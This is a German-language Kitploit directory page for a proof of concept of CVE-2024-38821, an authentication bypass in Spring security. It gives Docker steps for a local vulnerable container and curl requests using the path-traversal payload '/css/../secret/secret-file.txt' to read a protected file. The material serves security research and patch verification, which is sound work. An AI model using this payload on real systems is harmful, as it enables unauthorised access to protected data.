Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-38821-POC | Kitploit
Tools/GitHubGitHub/masa42/cve-2024-38821-poc
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubmasa42/cve-2024-38821-poc

CVE-2024-38821-POC

Repository anzeigen
12vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-38821: Proof of Concept (PoC): Authentifizierungsumgehung im Spring Framework

Dies ist ein Proof of Concept für die CVE-2024-38821-Schwachstelle

Ausführungsschritte

  1. Docker-Image erstellen (Spring Boot 3.3.4, basierend auf Spring Framework 6.1.13)

    root@kitploit:~
    cd vuln
    docker build -t cve-2024-38821-poc .
    
  2. Container ausführen und Port 8080 auf dem Host-System verfügbar machen

    root@kitploit:~
    docker run -d -p 8080:8080 --name cve-2024-38821-poc cve-2024-38821-poc
    
  3. Führen Sie den folgenden Befehl aus, um den PoC auszuführen und die Schwachstelle zu bestätigen

    root@kitploit:~
    curl -v --path-as-is "http://localhost:8080/secret/secret-file.txt" # Erwartet: 302-Antwort (Anmeldung erforderlich)
    curl -v --path-as-is "http://localhost:8080/css/../secret/secret-file.txt" # Erwartet: 200-Antwort (Authentifizierung umgangen)
    

    Wenn der Angriff erfolgreich ist, zeigt die Antwort Folgendes an: This is a secret file.

Erklärung

  1. Erstellen Sie SecurityConfig.java, um die Zugriffsberechtigungen zu konfigurieren:

    • Erlauben Sie unbefugten Zugriff auf Pfade unter /css/.
    • Verlangen Sie eine Authentifizierung für Pfade unter /secret/.
    root@kitploit:~
    public SecurityWebFilterChain securityWebFilterChain(ServerHttpSecurity http) {
        return http
            .authorizeExchange(exchange -> exchange
                .pathMatchers("/css/**", "/").permitAll() // Statische Ressourcen und die Startseite erfordern keine Authentifizierung
                .pathMatchers("/secret/**").authenticated() // Für den Pfad "secret" ist eine Authentifizierung erforderlich
                .anyExchange().authenticated() // Für alle anderen Pfade ist eine Authentifizierung erforderlich
            )
            .formLogin().and() // Formularbasierte Authentifizierung aktivieren
            .build();
    }
    
  2. Erstellen Sie die folgende Payload. Da die Payload mit /css/ beginnt, entspricht sie dem erlaubten Pfadmuster. Sie beginnt nicht mit /secret/, daher entspricht sie nicht dem Pfadmuster, das eine Authentifizierung erfordert:

    • Pfad: /css/../secret/secret-file.txt
  3. Verwenden Sie den folgenden curl-Befehl, um den PoC auszuführen und zu überprüfen, ob der Angriff erfolgreich ist:

    root@kitploit:~
    # Hinweis: Die Option --path-as-is ist erforderlich, um die Anfrage ohne URL-Normalisierung zu senden.
    curl -v --path-as-is "http://localhost:8080/css/../secret/secret-file.txt"
    

Haftungsausschluss

Dieser PoC dient zu Bildungs- und Sicherheitsforschungszwecken. Bevor Sie dies in einem realen System verwenden, stellen Sie sicher, dass die Schwachstelle behoben wurde und Sie über die entsprechende Genehmigung verfügen. Der Autor übernimmt keine Verantwortung für eine missbräuchliche Verwendung dieses Codes.

Tool herunterladen

Wenn der Angriff erfolgreich ist, zeigt die Antwort Folgendes an: This is a secret file.